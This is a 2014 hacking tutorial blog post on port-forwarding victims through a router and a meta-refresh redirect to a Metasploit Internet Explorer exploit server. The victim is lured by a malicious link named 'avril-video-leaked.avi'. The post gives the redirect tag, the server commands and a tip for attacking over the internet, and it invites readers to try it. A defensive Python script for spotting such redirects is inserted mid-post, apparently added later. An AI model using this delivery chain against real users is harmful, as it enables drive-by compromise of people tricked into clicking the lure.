Saturday 4 January 2014

How To Port Forward Browser Exploit From Router To Your Exploit Server

Type : Tips and Trick
Level : Easy – Medium
I believe this tips and trick, "How to Port Forward Browser Exploit From Router to Your Exploit Server", will be useful for those of you who are still confused about port redirection. BTW, you can view my previous tutorial about port redirection on Windows in this page.
On that post, there’s a comment from Nikos asking how to forward from a router to your exploit server. I believe that when he asked this he was maybe a little confused by the URIPATH (something like http://192.168.1.2/URIPATH), because with the SPI port forward from my previous post you can’t forward a web address; you can only forward an IP address followed by a port number (e.g. 192.168.1.5:8080), without any URIPATH.
That is why this tips and trick was made: to deal with the problem where you can’t add a URIPATH when forwarding/redirecting incoming connections to your exploit server.
Let’s start…

Requirements :

1. Apache Web Server (already bundled with Backtrack)
2. Exploit server (you can look at the other hacking tutorial guides HERE)

Step by Step :

Here’s the topology for this case:
[Image: network topology]
Victim (Windows XP SP3) IP address : 192.168.8.93
Attacker Router (Windows 7 SP1) IP address : 192.168.8.89
Exploit Server / Attacker (Backtrack 5 R2) IP address : 192.168.8.91
1. Here’s the scene: the attacker (the exploit server) sends a malicious link to the victim via e-mail, messenger, etc. The attacker has a router with a public IP address, and his computer uses a local IP address (192.168.8.91).
2. The picture below shows what the attacker does on his router to forward every incoming packet on port 80 to port 80 of his computer’s local IP address.
[Image: port forwarding configuration on the attacker’s router]
3. For this tips and trick I use the exploit from this hacking tutorial (http://vishnuvalentino.com/hacking-tutorial/exploiting-ms11_003-internet-explorer-vulnerability-using-metasploit-framework/), but I changed the SRVPORT option to the default, port 8080. As you can see in the picture below, I’ve already started the exploit server so it listens for every incoming connection.
[Image: exploit server started and listening]
4. In this state, if the victim tries to access 192.168.8.89 he will see nothing, or even an error page. That’s because the attacker’s router forwards packets arriving on port 80 to 192.168.8.91 port 80, but port 80 on the exploit server isn’t active, so we need to activate it.
You can activate the Apache web server by running this command in your terminal:
/etc/init.d/apache2 start
5. But the command in step 4 results in the following page in the victim’s web browser:
[Image: default Apache page in the victim’s browser]
Hey, where’s the exploit? It’s the default Apache page…
6. Because our exploit server runs on 192.168.8.91:8080/avril-video-leaked.avi, not on port 80, we need to redirect to the proper location. Here are the steps:
Open your terminal (CTRL + ALT + T) and type :
pico /var/www/index.html
to edit the default index.html page; and then add the following code :
<meta http-equiv="refresh" content="0;url=http://192.168.8.91:8080/avril-video-leaked.avi" />
to redirect the default index.html page to our exploit server (see picture below).
[Image: index.html with the meta refresh tag added]
Press CTRL to save and press CTRL to quit.
7. Now every page request to the attacker’s default Apache server will be redirected to the exploit server.
8. Why not give it a try on your own machine?
Hope it’s useful :-)
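Seen from the defending side, the redirect in step 6 is easy to spot in fetched HTML: a meta refresh with zero delay that leaves the host it was served from and lands on a non-standard port. The Python check below is an added example, not part of the original post; the function names and the 5-second MAX_DELAY threshold are assumptions, and the sample input is constructed from the tag shown in step 6.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

MAX_DELAY = 5  # assumption: a refresh firing within 5 s counts as automatic
DEFAULT_PORTS = {"http": 80, "https": 443}

class MetaRefreshCollector(HTMLParser):
    contents = ()  # immutable default; each instance rebinds its own tuple
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").strip().lower() == "refresh":
            self.contents += (a.get("content", ""),)

def origin(url):
    p = urlsplit(url)
    return p.scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(p.scheme)

def parse_refresh(content):  # "0;url=http://h/x" -> (delay, target), or None
    delay_text, _, rest = (s.strip() for s in content.partition(";"))
    if rest[:4].lower() == "url=":
        rest = rest[4:].strip().strip("'\"")
    try:
        return float(delay_text or 0), rest
    except ValueError:
        return None

def find_suspicious_refreshes(html, served_from):
    """Return (target_url, delay, reasons) for fast refreshes that leave the site."""
    collector = MetaRefreshCollector()
    collector.feed(html)
    findings = []
    for content in collector.contents:
        parsed = parse_refresh(content)
        if not parsed or not parsed[1] or parsed[0] > MAX_DELAY:
            continue
        target = urljoin(served_from, parsed[1])
        src, dst = origin(served_from), origin(target)
        reasons = []
        if dst[1] != src[1]:
            reasons.append("different host")
        if dst[2] not in DEFAULT_PORTS.values():
            reasons.append(f"non-standard port {dst[2]}")
        if reasons:
            findings.append((target, parsed[0], reasons))
    return findings

# Constructed sample: the tag from step 6, fetched via the router-facing address.
SAMPLE = '<meta http-equiv="refresh" content="0;url=http://192.168.8.91:8080/avril-video-leaked.avi" />'
print(find_suspicious_refreshes(SAMPLE, "http://192.168.8.89/"))
```

A same-site refresh, or one with a long delay, returns an empty list, so the check can run over proxy-captured pages or a crawl of your own web roots without flagging ordinary "page moved" notices.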

F.A.Q :

1. Will this method redirect correctly to my exploit server?
Answer: Yes, of course, if you set it up correctly.
2. Above this post you gave an update that this method only works for a network with 2 network addresses… what if I want to do it from WAN / Internet?
Answer: Make sure that when you set up URIPATH you give it an empty string, like this
set URIPATH ""
so your router (see step 2) can forward every incoming packet directly to your exploit server.